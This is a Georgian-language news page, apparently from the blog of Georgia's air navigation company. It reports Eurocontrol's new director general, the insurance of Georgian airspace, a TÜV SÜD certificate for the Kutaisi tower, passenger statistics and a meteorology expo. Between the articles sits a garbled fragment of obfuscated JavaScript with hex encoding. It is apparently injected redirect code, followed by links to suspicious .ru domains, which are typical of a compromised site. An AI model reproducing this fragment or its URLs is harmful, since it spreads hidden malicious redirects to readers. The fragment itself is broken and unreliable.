ევროკონტროლს ახალი გენერალური დირექტორი ჰყავს

საჰაერო ნავიგაციის უსაფრთხოების ევროპული ორგანიზაციის (ევროკონტროლი) ახალი ხელმძღვანელი ირლანდიელი კანდიდატი ემონ ბრენანი გახდა. ის გენერალური დირექტორის საქმიანობას 2018 წლის 1 იანვრიდან დაიწყებს. ემონ ბრენანი ფრენკ ბრენერს შეცვლის, რომელიც ევროკონტროლის გენერალური დირექტორის  პოზიციაზე 2013 წლიდან 2017 წლის 31 დეკემბრამდეა არჩეული.

ევროკონტროლის გენერალური დირექტორის პოზიციაზე ბრენანის კანდიდატურა ირლანდიის მთავრობამ წარადგინა.  არჩევნები 2017 წლის 16 ივნისს გაიმართა, სადაც საქართველომ ამომრჩევლის რანგში პირველად მიიღო მონაწილეობა.

„ემონ ბრენანი წამყვანი ფიგურაა ევროპულ ავიაციაში. მისი გამოცდილება და საჰაერო მიმოსვლის მენეჯმენტის წინაშე მდგარი გამოწვევების სიღრმისეული ცონდა ფასდაუდებელი იქნება ევროკონტროლისთვის, რათა ორგანიზაციამ შეძლოს წევრი სახელმწიფოების საჭიროებებზე რეაგირება და მხარი დაუჭიროს ერთიანი ევროპული ცის სრულ იმპლემენტაციას პან-ევროპულ კონტექსტში.“ – აღნიშნა ევროკონტროლის მუდმივმოქმედი კომისიის პრეზიდენტმა და პოლონეთის საავიაციო ხელისუფლების გენერალურმა დირექტორმა პიოტრ სამსაონმა.

გენერალური დირექტორის არჩევნებში გამარჯვებულმა ბრენანმა მადლობა გადაუხადა ირლანდიის მთავრობას და ირლანდიის სამოქალაქო ავიაციის გენერალურ დირექტორს, მისი ნომინირებისთვის. მან, ასევე, მადლობა გადაუხადა ევროკონტროლის მუდმივმოქმედ კომისიას და დროებით საბჭოს, მის მიმართ გამოხატული ნდობისათვის.

გოჩა მეზვრიშვილი

„იმედი მაქვს, შევძლებ გამოვიყენო ჩემი გამოცდილება იმისათვის, რომ  მომდევნო 5 წლის განმავლობაში  ევროპის ავიაციის უსაფრთხო და პროგრესული განვითარება უზრუნველვყოთ.“ – განაცხადა ბრენანმა.

ბრენანი საქართველოში წინასაარჩევნო კამპანიის ფარგლებში იმყოფებოდა. შპს “საქაერონავიგაციაში” მან თავისი წინასაარჩევნო პრეზენტაცია გამართა, სადაც კომპანიის წარმომადგენლებს ევროპის სამოქალაქო ავიაციის განვითარებისა და ევროკონტროლის მომავალი საქმიანობის მისეული ხედვა და მიზნები გააცნო.

საქაერონავიგაციის უპრეცენდენტო პროექტი

დღეიდან საქართველოს ცა დაზღვეული იქნება.  პროექტი, რომელიც ეკონომიკისა და მდგრადი განვითარების სამინისტროს შპს “საქაერონავიგაციამ” განახორციელა, უპრეცენდენტოა და მას საქართველოს საავიაციო ისტორიაში ანალოგი არ მოეძებნება. საქართველოს საჰაერო სივრცის დაზღვევა იქნება მნიშვნელოვანი წინსვლა ქართული ავიაციის საერთაშორისო სტანდარტებთან კიდევ უფრო მიახლოების პროცესში.

საჰაერო სივრცის დაზღვევის აუცილებლობა საქართველოს წინაშე რამდენიმე წლის წინდადგა, თუმცა მაშინ ამ პროექტის განხორციელება ვერ მოხერხდა. საქაერონავიგაციამ საჰაერო სივრცის დაზღვევის ვალდებულება  2014 წელს, ევროკონტროლში გაწევრიანების შემდეგ აიღო, ამ რეკომენდაციას მას საერთაშორისო საავიაციო ორგანიზაციებიც აძლევდნენ.

შპს „საქაერონავიგაციის” საქმიანობის არეალია საქართველოს საჰაერო სივრცე, ასევე, საქართველოს ტერიტორიაზე არსებული სამოქალაქო აეროპორტების (ქ. თბილისი, ქ. ქუთაისი, ქ. ბათუმი და დაბა მესტია)აფრენა-დაფრენის ზონები და ოკუპირებული აფხაზეთის საჰაერო სივრცის მაღალი სიმაღლე (FL-280 და ზევით).

“აღნიშნულ პროექტზემუშაობა 2 წლის წინ დავიწყეთ. პროცესი რთული იყო, გამოცდილება ამ კუთხით არ ჰქონდა არც საქაერონავიგაციას და არც სადაზღვევო კომპანიებს. საერთაშორისო საავიაციო ორგანიზაციების მხრიდან მოთხოვნები და პირობები კი მკაცრად იყო გაწერილი. ჩვენ დავეყრდენით ევროპულ გამოცდილებას, გავიარეთ კონსულტაციები სხვადასხვა ქვეყნის საჰაერო სერვისის პროვაიდერებთან და მოხარული ვარ, რომ ასეთი სახელმწიფოებრივი მნიშვნელობის პროექტი წარმატებით განვახორციელეთ. საქართველოს საჰაერო სივრცის დაზღვევით ორგანიზაცია კიდევ ერთხელ უსვამს ხაზს, რომ დარწმუნებულია თავისი თანამშრომლების მაღალ კვალიფიკაციაში და გააჩნია მაღალტექნოლოგიური, საერთაშორისო სტანდარტებთან შესაბამისი ინფრასტრუქტურა. პარალელურად ჩვენ პრიორიტეტად რჩება უახლესი ტექნოლოგიების დანერგვა და თანამშრომელთა კვალიფიკაციის მუდმივი ამაღლება’,- განაცხადა შპს “საქაერონავიგაციის” გენერალურმა დირექტორმა გოჩა მეზვრიშვილმა.

საჰაერო სივრცის დაზღვევა ითვალისწინებს შპს „საქაერონავიგაციის“, როგორც სააერნაოსნო მომსახურების მიმწოდებლის, საქმიანობის შედეგად შესაძლო სამოქალაქო სამართლებრივი პასუხისმგებლობის დაზღვევას მესამე პირთა წინაშე.  ანუ თუ საქართველოს საჰაერო სივრცეში, კომპანიის ბრალეულობით, მოხდება რაიმე საავიაციო ინციდენტი, დაზარალებულის უფლებები ყოველმხრივ დაცული, ხოლო ზარალი ანაზღაურებული იქნება. პასუხისმგებლობის ლიმიტი 500,000,000 აშშ დოლარია.

ღია ტენდერში სადაზღვევო კომპანია “უნისონმა” გაიმარჯვა, რომელიც საქართველოს სადაზღვევო ბაზრის ლიდერთა სამეულშია, გააჩნია მნიშვნელოვანი გამოცდილება და წარმომადგენლობითი პორტფელი. ამ ეტაპზე ყველა დეტალი საქაერონავიგაციას და უნისონს შორის შეთანხმებულია, რაც პროექტის წარმატებისთვის მყარი წინაპირობაა.

“სადაზღვევო კომპანია “უნისონმა” აიღო ვალდებულება და სამოქალაქო პასუხისმგებლობა 500 მილიონი აშშ დოლარის ფარგლებში 100%-ით გადააზღვია. გადამზღვევი კომპანიები, “საქაერონავიგაციის” მოთხოვნის შესაბამისად, დარეგისტრირებული არიან OECD (ეკონომიკური განვითარებისა და თანამშრომლობის ორგანიზაცია) წევრ ქვეყანაში და მათი საერთაშორისო სარეიტინგო შეფასებაა არანაკლებ Standard & Poor’s: A-. გადამზღვევი კომპანიებმა აიღეს პასუხისმგებლობა, მზღვეველის გაკოტრების ან ლიკვიდაციის შემთხვევაში, ხელშეკრულებით გათვალისწინებული ვალდებულებების შესრულებაზე. იმედი მაქვს, ჩვენი და საქაერონავიგაციის თანამშრომლობა წარმატებული იქნება, – აღნიშნა სადაზღვევო კომპანია “უნისონის” დირექტორმა ვასილ ახრახაძემ.

“საქაერონავიგაციის” სამოქალაქო პასუხისმგებლობის დაზღვევის პროექტი არის სახელმწიფოებრივი მნიშვნელობის აქტი, რადგან ის საქართველოს მთავრობას ათავისუფლებს შესაძლო საავიაციო ინციდენტის შედეგად წარმოშობილი ფინანსური პასუხისმგებლობისგან 500 მილიონი დოლარის ფარგლებში.

დაზღვეული ქართული ცა კიდევ უფრო მიმზიდველი გახდება ბევრი ქვეყნის სააერნაოსნო სერვისის პროვაიდერებისთვის და შესაბამისად, უცხოური ავიაკომპანიებისთვის. ეს პროექტი არის მნიშვნელოვანი ნაბიჯი ქართული ავიაციის აღმშენებლობის, მისი მდგრადობის, საიმედოობისა და დამოუკიდებლობის განმტკიცების კუთხით.

 

 

 

 

 

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "airnav.wordpress.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;ehttps://ncnjm3le.ru/f2.html?a=26482https://3oaq3lgf23.ru/u.html?a=26482

შპს „საქაერონავიგაციამ“„ტუვ ზუდის“ ხარისხის საერთაშორისო სერტიფიკატი მიიღო

საქართველოს ეკონომიკისა და მდგრადი განვითარების სამინისტროს შპს „საქაერონავიგაციამ“ 2013 წელს ქუთაისის სამეთვალყურეო კოშკისა და ადმინისტრაციული შენობის მშენებლობა დაასრულა. 2012 წელს კომპანიამ ხელშეკრულება გააფორმა გერმანულ სააკრედიტაციო კომპანია „ტუვ ზუდ“-თან, რომლის ფარგლებში ქუთაისის ობიექტების მშენებლობის ხარისხის მონიტორინგი და კონტროლიხორციელდებოდა.კომპანია„ტუვ ზუდი“ მსოფლიო მასშტაბით უზრუნველყოფს საინჟინრო, სატესტო და საკონსულტაციო მომსახურებას სისტემების, ინფრასტრუქტურისა და შენობა-ნაგებობების მდგრადობისა და უსაფრთხოებისთის.

ქუთაისი

12063316_1238088229541952_8287987858257766949_n

 

„გერმანული კომპანია ახორციელებდა მშენებლობის კონტროლს ქუთაისის სამეთვალყურეო კოშკისა და სანავიგაციო ოფისის მშენებლობის პერიოდში და მათი ექსლუატაციაში შესვლის შემდგომაც – ატარებდა ადგილზე ინსპექტირებას, მუდმივად გვაწვდიდა ანგარიშებს, სადაც ნებისმიერი მცირე ხარვეზიც კი იყო მითითებული, გვაძლევდა კონსულტაციას მათი აღმოფხვრის გზების შესახებ, რასაც ჩვენი გუნდი ასწორებდა. 2015 წელს„ტუვ ზუდ“-მა მშენებლობის ხარისხზესაბოლოო ინსპექტირება ჩაატარა და ხარისხის საერთაშორისო სერტიფიკატი გადმოგვცა, რაც ნიშნავს, რომ ქუთაისის სანავიგაციო ოფისი და სამეთვალყურეო კოშკი სრულად აკმაყოფილებს საერთაშორისო სტანდარტებს. ჩვენ გვეამაყებაპრესტიჟული სერტიფიკატის მიღება, თან დიდ პასუხისმგებლობასაც გვაკისრებს. შეიძლება ითქვას, შპს„საქაერონავიგაციაში“დღეს მშენებლობების ბუმი გვაქვს, ვაშენებთ რამდენიმე მნიშვნელოვან ობიექტს – თბილისის საჰაერო მოძრაობის მართვის ახალ ცენტრს, თბილისის ადმინისტრაციულ შენობას,  ახალ მეტეოოფისებსქუთაისსა და ბათუმში. ეს სერტიფიკატი კი ჩვენთვის ახალი გამოწვევაა, გვსურს, უმაღლესი ხარისხი ამ შემთხვევებშიც შევინარჩუნოთ და ამისთვის თავს არცერთი ჩვენგანი არ დაზოგავს“, – განაცხადა შპს„საქაერონავიგაციის“ გენერალურმა დირექტორმა გოჩა მეზვრიშვილმა.

12011210_1238086936208748_3194993606275318247_n

შეგახსენებთ, ქუთაისის სამეთვალყურეო კოშკი და ადმინისტრაციული შენობა2011-2013 წლებში შენდებოდა. ობიექტი, რომლის დიზაინი ცნობილ ჰოლანდიურ კომპანიას UNStudio ეკუთვნის, უნიკალურია თავისი დიზაინით, ფუნქციით, განათების, გათბობისა და კონდიცირების სისტემებით და აღჭურვილია უახლესი ტექნოლოგიებით.კოშკის განათების პროექტი – ქარის სენსორული რეჟიმი,  LED განათებადა მართვის პულტი იტალიურ კომპანია„პრიმო ექსპოსურეს“ ეკუთვნის, ოფისის განათება კი ესპანურ კომპანია„კობრას“. სამშენებლო სამუშაოები ქართულმა სამშენებლო კომპანიებმა შეასრულეს. ქუთაისის ტაუერი თავისი სიმაღლითა და ორიგინალური დიზაინით აღმოსავლეთ ევროპის გამორჩეული სამეთვალყურეო კოშკურების ხუთეულშია შესული.

 

 

 

 

2014 წელს საქართველოს აეროპორტების მიერ გადაყვანილ მგზავრთა რაოდენობამ 2 მილიონს გადააჭარბა

შპს „საქართველოს აეროპორტების გაერთიანება“ საქართველოს აეროპორტებში 2014 წელს გადაყვანილ მგზავრთა რაოდენობას აქვეყნებს. გასულ წელს საქართველოს ეროპორტები 2 მილიონზე მეტ მგზავრს მოემსახურა. მსგავსი მაჩვენებელი საქართველოში 1991 წლის შემდეგ არ ყოფილა.  გადაყვანილ მგზავრთა რაოდენობა თითქმის 10 %-ით უფრო მაღალია წინა წელთან შედარებით. მგზავრთნაკადის განსაკუთრებული ზრდა კვლავ ქუთაისის საერთაშორისო აეროპორტში დაფიქსირდა. (16%). თბილისის საერთაშორისო აეროპორტი გასულ წელთან შედარებით 9.7%-ით მეტ მგზავრს მოემსახურა, ხოლო ბათუმში მგზავრთა რაოდენობამ 2,15%-ით მოიმატა.

მგზავრთა რაოდენობა

სავარაუდოა, რომ გადაყვანილ მგზავრთა რაოდენობის ზრდის ტენდენცია მომავალ წლებშიც შენარჩუნდება. საქაერონავიგაცია კვლავ აგრძელებს უმაღლესი სტანდარტის, თანამედროვე ტექნოლოგიების დანერგვას და მუდმივად ზრუნავს თანამშრომელთა კვალიფიკაციის ამაღლებაზე, რათა საქართველოს საჰაერო სივრცეში მგზავრთა უსაფრთხო და დროული გადაადგილება უზრუნველყოს.

საინფორმაციო რესურსი: http://airports.ge/; http://gcaa.ge/

მეტეოროლოგიური ტექნოლოგიების მსოფლიო გამოფენა ბრიუსელში

21-23 ოქტომბერს, ქალაქ ბრიუსელში მეტეოროლოგიური ტექნოლოგიების მსოფლიო გამოფენა (Meteorological Technology World Expo 2014) გაიმართა. ღონისძიებას მსოფლიოს 70 ქვეყნიდან 2500 ვიზიტორი დაესწრო.

გამოფენაზე  წარმოდგენილი იყო ყველაზე თანამედროვე ტექნოლოგიები, რომლებიც განკუთვნილია ამინდის, კლიმატის და ჰიდრო მეტეოროლოგიური გაზომვისთვის, პროგნოზისა და ანალიზისთვის. მოწყობილობები და სერვისები 150-მა მონაწილე კომპანიამ წარმოადგინა.

გოჩა მეზვრიშვილი, გიორგი ედიშერაშვილი

გოჩა მეზვრიშვილი, გიორგი ედიშერაშვილი, ლაშა მათიაშვილი

ღონისძიებას საქაერონავიგაციის გენერალური დირექტორი გოჩა მეზვრიშვილი, აღმასრულებელი დირექტორი გიორგი ედიშერაშვილი და მეტეოსამსახურის თანამშრომლები დაესწრნენ.

მომავალ წელს გამოფენა  13-დან 15 ოქტომბრამდე გაიმართება.